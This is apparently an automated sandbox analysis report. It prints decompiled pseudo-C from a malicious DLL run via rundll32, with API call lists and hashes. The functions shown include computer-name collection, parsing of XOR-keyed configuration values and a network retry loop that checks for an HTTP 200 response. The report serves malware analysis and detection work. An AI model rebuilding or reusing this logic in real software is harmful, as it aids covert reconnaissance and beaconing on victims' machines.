Instruction addresses (one per decompiled line, as listed by the report): 0x04284a2e, 0x04284a3b, 0x04284a3d, 0x04284a3e, 0x04284a46, 0x04284a46, 0x04284a4a, 0x00000000, 0x00000000, 0x04284a41, 0x04284a42, 0x04284a45, 0x04284a45, 0x04284a52, 0x04284a57, 0x04284a5c, 0x04284a64, 0x04284a6a, 0x04284a6c, 0x04284a6f, 0x04284a73, 0x04284a75, 0x04284a78, 0x04284a78, 0x04284a79, 0x04284a7b, 0x04284a78, 0x04284a85, 0x04284a88, 0x04284a8b, 0x04284a8c, 0x04284a8e, 0x04284a95, 0x04284a95, 0x04284aa1

                                APIs
                                • StrChrA.SHLWAPI(?,00000020,00000000,04D795AC,042830F3,?,04281173,?,04D795AC,?,042830F3), ref: 04284A46
                                • StrTrimA.SHLWAPI(?,0428C284,00000002,?,04281173,?,04D795AC,?,042830F3), ref: 04284A64
                                • StrChrA.SHLWAPI(?,00000020,?,04281173,?,04D795AC,?,042830F3), ref: 04284A6F
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
• Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
• Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
• Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
• Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: Trim
                                • String ID:
                                • API String ID: 3043112668-0
                                • Opcode ID: 34d0d5830c83bb7d7f52c0ad4dce97fbf25d6e39be78fce90c3d35a340ea9e5b
                                • Instruction ID: f5d0beb16a9018a65214da0dee384eb9644a78272c0794507fe2ec706b199222
                                • Opcode Fuzzy Hash: 34d0d5830c83bb7d7f52c0ad4dce97fbf25d6e39be78fce90c3d35a340ea9e5b
                                • Instruction Fuzzy Hash: E5019E713223076BE7207F6A9C68F6F7B9DEB85744F408019A945CF2C2EA74E8028664
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E04288B22(void* _a4) {
                                				char _t2;
                                
                                				_t2 = RtlFreeHeap( *0x428d238, 0, _a4); // executed
                                				return _t2;
			}

Instruction addresses (one per decompiled line, as listed by the report): 0x04288b2e, 0x04288b34

                                APIs
                                • RtlFreeHeap.NTDLL(00000000,00000000,0428131A,00000000,?,?,00000000), ref: 04288B2E
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
• Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
• Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
• Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
• Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: FreeHeap
                                • String ID: Ut
                                • API String ID: 3298025750-8415677
                                • Opcode ID: cb99f40af25a69ebe82c9da27074d08b01e33ab1b3214f77ba0d170a8f2ee83f
                                • Instruction ID: 4a89a1b937db1e6bdc04c5a9ac6564f845fd10367cd0e6df62be520023897a65
                                • Opcode Fuzzy Hash: cb99f40af25a69ebe82c9da27074d08b01e33ab1b3214f77ba0d170a8f2ee83f
                                • Instruction Fuzzy Hash: 7EB01271301100EBDA114B45FE0CF0DFA21EB50740F004019B304080B487354C20FB25
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 75%
                                			E042876E7(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                				void* _v8;
                                				void* __esi;
                                				intOrPtr* _t35;
                                				void* _t40;
                                				intOrPtr* _t41;
                                				intOrPtr* _t43;
                                				intOrPtr* _t45;
                                				intOrPtr* _t50;
                                				intOrPtr* _t52;
                                				void* _t54;
                                				intOrPtr* _t55;
                                				intOrPtr* _t57;
                                				intOrPtr* _t61;
                                				intOrPtr* _t65;
                                				intOrPtr _t68;
                                				void* _t72;
                                				void* _t75;
                                				void* _t76;
                                
                                				_t55 = _a4;
                                				_t35 =  *((intOrPtr*)(_t55 + 4));
                                				_a4 = 0;
                                				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                				if(_t76 < 0) {
                                					L18:
                                					return _t76;
                                				}
                                				_t40 = E04288A19(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                				_t76 = _t40;
                                				if(_t76 >= 0) {
                                					_t61 = _a28;
                                					if(_t61 != 0 &&  *_t61 != 0) {
                                						_t52 = _v8;
                                						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                					}
                                					if(_t76 >= 0) {
                                						_t43 =  *_t55;
                                						_t68 =  *0x428d2a8; // 0xaea5a8
                                						_t20 = _t68 + 0x428e1fc; // 0x740053
                                						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                						if(_t76 >= 0) {
                                							_t76 = E0428A6BC(_a4);
                                							if(_t76 >= 0) {
                                								_t65 = _a28;
                                								if(_t65 != 0 &&  *_t65 == 0) {
                                									_t50 = _a4;
                                									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                								}
                                							}
                                						}
                                						_t45 = _a4;
                                						if(_t45 != 0) {
                                							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                						}
                                						_t57 = __imp__#6;
                                						if(_a20 != 0) {
                                							 *_t57(_a20);
                                						}
                                						if(_a12 != 0) {
                                							 *_t57(_a12);
                                						}
                                					}
                                				}
                                				_t41 = _v8;
                                				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                				goto L18;
			}

Instruction addresses (one per decompiled line, as listed by the report): 0x042876ed, 0x042876f0, 0x04287700, 0x04287709, 0x0428770d, 0x042877db, 0x042877e1, 0x042877e1, 0x04287727, 0x0428772c, 0x04287730, 0x04287736, 0x0428773b, 0x04287742, 0x04287751, 0x04287751, 0x04287755, 0x04287757, 0x04287763, 0x0428776e, 0x04287779, 0x0428777d, 0x04287787, 0x0428778b, 0x0428778d, 0x04287792, 0x04287799, 0x042877a9, 0x042877a9, 0x04287792, 0x0428778b, 0x042877ab, 0x042877b0, 0x042877b5, 0x042877b5, 0x042877b8, 0x042877c1, 0x042877c6, 0x042877c6, 0x042877cb, 0x042877d0, 0x042877d0, 0x042877cb, 0x04287755, 0x042877d2, 0x042877d8, 0x00000000

                                APIs
                                  • Part of subcall function 04288A19: SysAllocString.OLEAUT32(80000002), ref: 04288A76
                                  • Part of subcall function 04288A19: SysFreeString.OLEAUT32(00000000), ref: 04288ADC
                                • SysFreeString.OLEAUT32(?), ref: 042877C6
                                • SysFreeString.OLEAUT32(04284BD8), ref: 042877D0
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
• Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
• Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
• Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
• Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: String$Free$Alloc
                                • String ID:
                                • API String ID: 986138563-0
                                • Opcode ID: f299c815e71c8d3fa5ebbde5d2305e222f983fa348ce35e97d33d57d65eb7de6
                                • Instruction ID: 2de8641dd6250699bdbe08b130290a418cbd3b0d1abc0640b3101035695507e7
                                • Opcode Fuzzy Hash: f299c815e71c8d3fa5ebbde5d2305e222f983fa348ce35e97d33d57d65eb7de6
                                • Instruction Fuzzy Hash: C7315A76610119AFCB11EF58CC88C9FBB79FFC97447244698F9059B2A0E231ED91CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E04285D79(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
                                				void* _t21;
                                				void* _t22;
                                				signed int _t24;
                                				intOrPtr* _t26;
                                				void* _t27;
                                
                                				_t26 = __edi;
                                				if(_a4 == 0) {
                                					L2:
                                					_t27 = E04287DDD(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
                                					if(_t27 == 0) {
                                						_t24 = _a12 >> 1;
                                						if(_t24 == 0) {
                                							_t27 = 2;
                                							HeapFree( *0x428d238, 0, _a4);
                                						} else {
                                							_t21 = _a4;
                                							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
                                							 *_t26 = _t21;
                                						}
                                					}
                                					L6:
                                					return _t27;
                                				}
                                				_t22 = E04281037(_a4, _a8, _a12, __edi); // executed
                                				_t27 = _t22;
                                				if(_t27 == 0) {
                                					goto L6;
                                				}
                                				goto L2;
			}

Instruction addresses (one per decompiled line, as listed by the report): 0x04285d79, 0x04285d81, 0x04285d98, 0x04285db3, 0x04285db7, 0x04285dbc, 0x04285dbe, 0x04285dd0, 0x04285ddc, 0x04285dc0, 0x04285dc0, 0x04285dc5, 0x04285dca, 0x04285dca, 0x04285dbe, 0x04285de2, 0x04285de6, 0x04285de6, 0x04285d8d, 0x04285d92, 0x04285d96, 0x00000000, 0x00000000, 0x00000000

                                APIs
                                  • Part of subcall function 04281037: SysFreeString.OLEAUT32(00000000), ref: 0428109A
                                • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74E5F710,?,00000000,?,00000000,?,04285356,?,004F0053,04D79368,00000000,?), ref: 04285DDC
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
• Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
• Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
• Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
• Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: Free$HeapString
                                • String ID: Ut
                                • API String ID: 3806048269-8415677
                                • Opcode ID: 1341055beaacb5f1fa7cae7fe20b3c3384b16aede5e7d3541c44c67c1ad66e90
                                • Instruction ID: d1cc995a3f48134f6195bb81633eed029acb7245deddd04aa32cd71adb0ee0d0
                                • Opcode Fuzzy Hash: 1341055beaacb5f1fa7cae7fe20b3c3384b16aede5e7d3541c44c67c1ad66e90
                                • Instruction Fuzzy Hash: E1014F3221261AFBDF22AF54CC04FEE7B65EF04790F148019FE059A1A0D731E960DB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 37%
                                			E0428831C(void* __ecx) {
                                				signed int _v8;
                                				void* _t15;
                                				void* _t19;
                                				void* _t20;
                                				void* _t22;
                                				intOrPtr* _t23;
                                
                                				_t23 = __imp__;
                                				_t20 = 0;
                                				_v8 = _v8 & 0;
                                				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                                				_t10 = _v8;
                                				if(_v8 != 0) {
                                					_t20 = E04281525(_t10 + 1);
                                					if(_t20 != 0) {
                                						_t15 =  *_t23(3, _t20,  &_v8); // executed
                                						if(_t15 != 0) {
                                							 *((char*)(_v8 + _t20)) = 0;
                                						} else {
                                							E04288B22(_t20);
                                							_t20 = 0;
                                						}
                                					}
                                				}
                                				return _t20;
			}

Instruction addresses (one per decompiled line, as listed by the report): 0x04288321, 0x0428832c, 0x0428832e, 0x04288334, 0x04288336, 0x0428833b, 0x04288344, 0x04288348, 0x04288351, 0x04288355, 0x04288364, 0x04288357, 0x04288358, 0x0428835d, 0x0428835d, 0x04288355, 0x04288348, 0x0428836d

                                APIs
                                • GetComputerNameExA.KERNEL32(00000003,00000000,04289C7E,74E5F710,00000000,?,?,04289C7E), ref: 04288334
                                  • Part of subcall function 04281525: RtlAllocateHeap.NTDLL(00000000,00000000,04281278), ref: 04281531
                                • GetComputerNameExA.KERNEL32(00000003,00000000,04289C7E,04289C7F,?,?,04289C7E), ref: 04288351
                                  • Part of subcall function 04288B22: RtlFreeHeap.NTDLL(00000000,00000000,0428131A,00000000,?,?,00000000), ref: 04288B2E
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
• Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
• Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
• Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
• Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: ComputerHeapName$AllocateFree
                                • String ID:
                                • API String ID: 187446995-0
                                • Opcode ID: ddd5b48a48e6c6b69690b77f042120f49b44cb1aa6c95ef499c862571f08236d
                                • Instruction ID: c070baae042dd35decbd0250c3717040a1befe024220dba29d02e2d0b049b3f7
                                • Opcode Fuzzy Hash: ddd5b48a48e6c6b69690b77f042120f49b44cb1aa6c95ef499c862571f08236d
                                • Instruction Fuzzy Hash: C3F05476721206BEEB21F69E9C00EAFB6FCEBC5650F51105DA505D3181EA70EE01E770
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                				intOrPtr _t4;
                                				void* _t10;
                                				void* _t11;
                                				void* _t12;
                                				void* _t14;
                                
                                				_t14 = 1;
                                				_t4 = _a8;
                                				if(_t4 == 0) {
                                					if(InterlockedDecrement(0x428d23c) == 0) {
                                						E04284DB1();
                                					}
                                				} else {
                                					if(_t4 == 1 && InterlockedIncrement(0x428d23c) == 1) {
                                						_t10 = E04282789(_t11, _t12, _a4); // executed
                                						if(_t10 != 0) {
                                							_t14 = 0;
                                						}
                                					}
                                				}
                                				return _t14;
			}

Instruction addresses (one per decompiled line, as listed by the report): 0x04287f04, 0x04287f05, 0x04287f08, 0x04287f3a, 0x04287f3c, 0x04287f3c, 0x04287f0a, 0x04287f0b, 0x04287f20, 0x04287f27, 0x04287f29, 0x04287f29, 0x04287f27, 0x04287f0b, 0x04287f44

                                APIs
                                • InterlockedIncrement.KERNEL32(0428D23C), ref: 04287F12
                                  • Part of subcall function 04282789: HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001,?,?,?,04287F25,?), ref: 0428279C
                                • InterlockedDecrement.KERNEL32(0428D23C), ref: 04287F32
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
• Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
• Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
• Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
• Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: Interlocked$CreateDecrementHeapIncrement
                                • String ID:
                                • API String ID: 3834848776-0
                                • Opcode ID: 6ee253a57a4367ba1e4d13155594888b03530237f5c46b783915229f234bdc93
                                • Instruction ID: fd1cfbf9e18aa32633c8136072b16d193ceca35591e22a58d79b66ac1e211b67
                                • Opcode Fuzzy Hash: 6ee253a57a4367ba1e4d13155594888b03530237f5c46b783915229f234bdc93
                                • Instruction Fuzzy Hash: 61E04F3133B123939B217A779C48B6EA640BBA07C4F25D46CF481D10D6D690E84096E1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E0428933A(signed int* __ecx, intOrPtr _a4, signed int* _a8, signed int* _a12) {
                                				intOrPtr _v12;
                                				signed int _v20;
                                				intOrPtr _v24;
                                				signed int _v60;
                                				char _v68;
                                				void* __ebx;
                                				void* __edi;
                                				void* __esi;
                                				intOrPtr _t14;
                                				signed int* _t16;
                                				signed int _t25;
                                				signed int _t26;
                                				signed int* _t28;
                                				signed int _t30;
                                
                                				_t28 = __ecx;
                                				_t14 =  *0x428d2c8; // 0x4d79618
                                				_v12 = _t14;
                                				_t16 = _a12;
                                				_t30 = 8;
                                				if(_t16 != 0) {
                                					 *_t16 =  *_t16 & 0x00000000;
                                				}
                                				do {
                                					_t31 =  &_v68;
                                					if(E04288C01( &_v68) == 0) {
                                						goto L16;
                                					}
                                					_t30 = E042897F7(_t31, _a4, _v12);
                                					if(_t30 == 0) {
                                						_t25 = E04285988(_t31, _t28); // executed
                                						_t30 = _t25;
                                						if(_t30 != 0) {
                                							if(_t30 == 0x102) {
                                								E0428D000 = E0428D000 + 0xea60;
                                							}
                                						} else {
                                							if(_v24 != 0xc8) {
                                								_t30 = 0xe8;
                                							} else {
                                								_t26 = _v20;
                                								if(_t26 == 0) {
                                									_t30 = 0x10d2;
                                								} else {
                                									_t28 = _a8;
                                									if(_t28 != 0) {
                                										_v60 = _v60 & _t30;
                                										 *_t28 = _v60;
                                										_t28 = _a12;
                                										if(_t28 != 0) {
                                											 *_t28 = _t26;
                                										}
                                									}
                                								}
                                							}
                                						}
                                					}
                                					E042858DB( &_v68, 0x102, _t28, _t30);
                                					L16:
                                				} while (_t30 == 0x2f19 && WaitForSingleObject( *0x428d26c, 0) == 0x102);
                                				return _t30;
                                			}

                                APIs
                                • WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74E481D0), ref: 042893EC
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: ObjectSingleWait
                                • String ID:
                                • API String ID: 24740636-0
                                • Opcode ID: d830422fc399954fabd02d1db6325a416042561eedbc46e40138192a37b85fe5
                                • Instruction ID: 5be8ebad3c1ff0dee52657e87e5ba5c7de579cc44a6492af784ee3155d6f1a6a
                                • Opcode Fuzzy Hash: d830422fc399954fabd02d1db6325a416042561eedbc46e40138192a37b85fe5
                                • Instruction Fuzzy Hash: 73216DB172220A9BEF11FE5DE854B7EB7A5AB80354F11402DE401A72E0DBB4FC85C750
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 34%
                                			E04281037(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                				intOrPtr _v12;
                                				void* _v18;
                                				char _v20;
                                				intOrPtr _t15;
                                				void* _t17;
                                				intOrPtr _t19;
                                				void* _t23;
                                
                                				_v20 = 0;
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosw");
                                				_t15 =  *0x428d2a8; // 0xaea5a8
                                				_t4 = _t15 + 0x428e39c; // 0x4d78944
                                				_t20 = _t4;
                                				_t6 = _t15 + 0x428e124; // 0x650047
                                				_t17 = E042876E7(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                                				if(_t17 < 0) {
                                					_t23 = _t17;
                                				} else {
                                					_t23 = 8;
                                					if(_v20 != _t23) {
                                						_t23 = 1;
                                					} else {
                                						_t19 = E04287EA4(_t20, _v12);
                                						if(_t19 != 0) {
                                							 *_a16 = _t19;
                                							_t23 = 0;
                                						}
                                						__imp__#6(_v12);
                                					}
                                				}
                                				return _t23;
                                			}

                                APIs
                                  • Part of subcall function 042876E7: SysFreeString.OLEAUT32(?), ref: 042877C6
                                  • Part of subcall function 04287EA4: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,042851D4,004F0053,00000000,?), ref: 04287EAD
                                  • Part of subcall function 04287EA4: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,042851D4,004F0053,00000000,?), ref: 04287ED7
                                  • Part of subcall function 04287EA4: memset.NTDLL ref: 04287EEB
                                • SysFreeString.OLEAUT32(00000000), ref: 0428109A
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: FreeString$lstrlenmemcpymemset
                                • String ID:
                                • API String ID: 397948122-0
                                • Opcode ID: a940456874d9983f5f362df7f0782c9fbabbea9fbbac02764933ad20608c96df
                                • Instruction ID: b2c3203e03f6e65d44e86dd9fb4c34776740a68e52e23bef79844fd2a21acd4e
                                • Opcode Fuzzy Hash: a940456874d9983f5f362df7f0782c9fbabbea9fbbac02764933ad20608c96df
                                • Instruction Fuzzy Hash: 9A014C32721169BEDB11AAA9DC04DAEBBB8EB45650B004529E904E60E1E771ED22C790
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                C-Code - Quality: 96%
                                			E04287FBE(int* __ecx) {
                                				int _v8;
                                				void* _v12;
                                				void* _v16;
                                				void* __esi;
                                				signed int _t28;
                                				signed int _t33;
                                				signed int _t39;
                                				char* _t45;
                                				char* _t46;
                                				char* _t47;
                                				char* _t48;
                                				char* _t49;
                                				char* _t50;
                                				void* _t51;
                                				void* _t52;
                                				void* _t53;
                                				intOrPtr _t54;
                                				void* _t56;
                                				intOrPtr _t57;
                                				intOrPtr _t58;
                                				signed int _t61;
                                				intOrPtr _t64;
                                				signed int _t65;
                                				signed int _t70;
                                				void* _t72;
                                				void* _t73;
                                				signed int _t75;
                                				signed int _t78;
                                				signed int _t82;
                                				signed int _t86;
                                				signed int _t90;
                                				signed int _t94;
                                				signed int _t98;
                                				void* _t103;
                                				intOrPtr _t121;
                                
                                				_t104 = __ecx;
                                				_t28 =  *0x428d2a4; // 0x69b25f44
                                				if(E04286247( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x90) {
                                					 *0x428d2d8 = _v8;
                                				}
                                				_t33 =  *0x428d2a4; // 0x69b25f44
                                				if(E04286247( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
                                					_v12 = 2;
                                					L69:
                                					return _v12;
                                				}
                                				_t39 =  *0x428d2a4; // 0x69b25f44
                                				if(E04286247( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
                                					L67:
                                					HeapFree( *0x428d238, 0, _v16);
                                					goto L69;
                                				} else {
                                					_t103 = _v12;
                                					if(_t103 == 0) {
                                						_t45 = 0;
                                					} else {
                                						_t98 =  *0x428d2a4; // 0x69b25f44
                                						_t45 = E04289403(_t104, _t103, _t98 ^ 0x7895433b);
                                					}
                                					if(_t45 != 0) {
                                						_t104 =  &_v8;
                                						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
                                							 *0x428d240 = _v8;
                                						}
                                					}
                                					if(_t103 == 0) {
                                						_t46 = 0;
                                					} else {
                                						_t94 =  *0x428d2a4; // 0x69b25f44
                                						_t46 = E04289403(_t104, _t103, _t94 ^ 0x219b08c7);
                                					}
                                					if(_t46 != 0) {
                                						_t104 =  &_v8;
                                						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
                                							 *0x428d244 = _v8;
                                						}
                                					}
                                					if(_t103 == 0) {
                                						_t47 = 0;
                                					} else {
                                						_t90 =  *0x428d2a4; // 0x69b25f44
                                						_t47 = E04289403(_t104, _t103, _t90 ^ 0x31fc0661);
                                					}
                                					if(_t47 != 0) {
                                						_t104 =  &_v8;
                                						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
                                							 *0x428d248 = _v8;
                                						}
                                					}
                                					if(_t103 == 0) {
                                						_t48 = 0;
                                					} else {
                                						_t86 =  *0x428d2a4; // 0x69b25f44
                                						_t48 = E04289403(_t104, _t103, _t86 ^ 0x0cd926ce);
                                					}
                                					if(_t48 != 0) {
                                						_t104 =  &_v8;
                                						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
                                							 *0x428d004 = _v8;
                                						}
                                					}
                                					if(_t103 == 0) {
                                						_t49 = 0;
                                					} else {
                                						_t82 =  *0x428d2a4; // 0x69b25f44
                                						_t49 = E04289403(_t104, _t103, _t82 ^ 0x3cd8b2cb);
                                					}
                                					if(_t49 != 0) {
                                						_t104 =  &_v8;
                                						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
                                							 *0x428d02c = _v8;
                                						}
                                					}
                                					if(_t103 == 0) {
                                						_t50 = 0;
                                					} else {
                                						_t78 =  *0x428d2a4; // 0x69b25f44
                                						_t50 = E04289403(_t104, _t103, _t78 ^ 0x2878b929);
                                					}
                                					if(_t50 == 0) {
                                						L41:
                                						 *0x428d24c = 5;
                                						goto L42;
                                					} else {
                                						_t104 =  &_v8;
                                						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
                                							goto L41;
                                						} else {
                                							L42:
                                							if(_t103 == 0) {
                                								_t51 = 0;
                                							} else {
                                								_t75 =  *0x428d2a4; // 0x69b25f44
                                								_t51 = E04289403(_t104, _t103, _t75 ^ 0x261a367a);
                                							}
                                							if(_t51 != 0) {
                                								_push(_t51);
                                								_t72 = 0x10;
                                								_t73 = E0428A0FD(_t72);
                                								if(_t73 != 0) {
                                									_push(_t73);
                                									E04289FF6();
                                								}
                                							}
                                							if(_t103 == 0) {
                                								_t52 = 0;
                                							} else {
                                								_t70 =  *0x428d2a4; // 0x69b25f44
                                								_t52 = E04289403(_t104, _t103, _t70 ^ 0xb9d404b2);
                                							}
                                							if(_t52 != 0 && E0428A0FD(0, _t52) != 0) {
                                								_t121 =  *0x428d32c; // 0x4d795b0
                                								E04281128(_t121 + 4, _t68);
                                							}
                                							if(_t103 == 0) {
                                								_t53 = 0;
                                							} else {
                                								_t65 =  *0x428d2a4; // 0x69b25f44
                                								_t53 = E04289403(_t104, _t103, _t65 ^ 0x3df17130);
                                							}
                                							if(_t53 == 0) {
                                								L59:
                                								_t54 =  *0x428d2a8; // 0xaea5a8
                                								_t22 = _t54 + 0x428e252; // 0x616d692f
                                								 *0x428d2d4 = _t22;
                                								goto L60;
                                							} else {
                                								_t64 = E0428A0FD(0, _t53);
                                								 *0x428d2d4 = _t64;
                                								if(_t64 != 0) {
                                									L60:
                                									if(_t103 == 0) {
                                										_t56 = 0;
                                									} else {
                                										_t61 =  *0x428d2a4; // 0x69b25f44
                                										_t56 = E04289403(_t104, _t103, _t61 ^ 0xd2079859);
                                									}
                                									if(_t56 == 0) {
                                										_t57 =  *0x428d2a8; // 0xaea5a8
                                										_t23 = _t57 + 0x428e791; // 0x6976612e
                                										_t58 = _t23;
                                									} else {
                                										_t58 = E0428A0FD(0, _t56);
                                									}
                                									 *0x428d340 = _t58;
                                									HeapFree( *0x428d238, 0, _t103);
                                									_v12 = 0;
                                									goto L67;
                                								}
                                								goto L59;
                                							}
                                						}
                                					}
                                				}
                                			}

                                APIs
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,042830F3,?,69B25F44,?,042830F3,69B25F44,?,042830F3,69B25F44,00000005,0428D00C,00000008), ref: 04288063
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,042830F3,?,69B25F44,?,042830F3,69B25F44,?,042830F3,69B25F44,00000005,0428D00C,00000008), ref: 04288095
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,042830F3,?,69B25F44,?,042830F3,69B25F44,?,042830F3,69B25F44,00000005,0428D00C,00000008), ref: 042880C7
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,042830F3,?,69B25F44,?,042830F3,69B25F44,?,042830F3,69B25F44,00000005,0428D00C,00000008), ref: 042880F9
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,042830F3,?,69B25F44,?,042830F3,69B25F44,?,042830F3,69B25F44,00000005,0428D00C,00000008), ref: 0428812B
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,042830F3,?,69B25F44,?,042830F3,69B25F44,?,042830F3,69B25F44,00000005,0428D00C,00000008), ref: 0428815D
                                • HeapFree.KERNEL32(00000000,042830F3,042830F3,?,69B25F44,?,042830F3,69B25F44,?,042830F3,69B25F44,00000005,0428D00C,00000008,?,042830F3), ref: 0428825B
                                • HeapFree.KERNEL32(00000000,?,042830F3,?,69B25F44,?,042830F3,69B25F44,?,042830F3,69B25F44,00000005,0428D00C,00000008,?,042830F3), ref: 0428826E
                                  • Part of subcall function 0428A0FD: lstrlen.KERNEL32(69B25F44,00000000,7673D3B0,042830F3,04288241,00000000,042830F3,?,69B25F44,?,042830F3,69B25F44,?,042830F3,69B25F44,00000005), ref: 0428A106
                                  • Part of subcall function 0428A0FD: memcpy.NTDLL(00000000,?,00000000,00000001,?,042830F3), ref: 0428A129
